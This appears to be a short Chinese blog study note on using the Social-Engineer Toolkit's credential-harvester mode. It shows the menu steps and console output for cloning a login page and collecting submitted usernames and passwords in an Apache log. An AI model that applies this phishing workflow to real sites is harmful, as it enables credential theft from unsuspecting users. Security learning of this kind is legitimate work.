!!!笔记仅供学习交流使用,请勿进行其他用途!!!
setoolkit是一个非常有用的社会工程学工具,里面有很多工具,这里作者只笔记下其最简单的使用方法。
setoolkit克隆网站的基本流程:
The Social-Engineer Toolkit is a product of TrustedSec. |
Visit: https://www.trustedsec.com |
1) Social-Engineering Attacks |
1) Spear-Phishing Attack Vectors |
2) Website Attack Vectors |
1) Java Applet Attack Method |
2) Metasploit Browser Exploit Method |
3) Credential Harvester Attack Method |
99) Return to Webattack Menu |
[-] Credential harvester will allow you to utilize the clone capabilities within SET |
[-] to harvest credentials or parameters from a website as well as place them into a report |
[-] SET supports both HTTP and HTTPS |
[-] Example: http://www.thisisafakesite.com |
set:webattack> Enter the url to clone:http://www.test.com/login.php |
[*] Cloning the website: http://www.test.com/login.php |
[*] This could take a little bit... |
The best way to use this attack is if username and password form |
fields are available. Regardless, this captures all POSTs on a website. |
[*] Apache is set to ON - everything will be placed in your web root directory of apache. |
[*] Files will be written out to the root directory of apache. |
[*] ALL files are within your Apache directory since you specified it to ON. |
[!] Apache may be not running, do you want SET to start the process? [y/n]: y |
[....] Starting web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName |
Apache webserver is set to ON. Copying over PHP file to the website. |
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt |
Feel free to customize post.php in the /var/www directory |
[*] All files have been copied to /var/www |
{Press return to continue} |
当有用户进入了这个克隆的网站,并且输入数据后,我们就可以看到后台的日志了:
harvester_2014-06-01 18:12:39.762872.txt index.html post.php |
[redirect_to] => http://www.test.com/login.php |
注意事项:
作者不是web开发出身,对于web开发不是太熟悉,简单的看了下 index.html 和 post.php 这两个文件,感觉使用这种方式克隆网站局限性还是很大的,必须是采用 post 方式提交才可以,不知道对不对,如果有大神路过,还请指点一二。
发表评论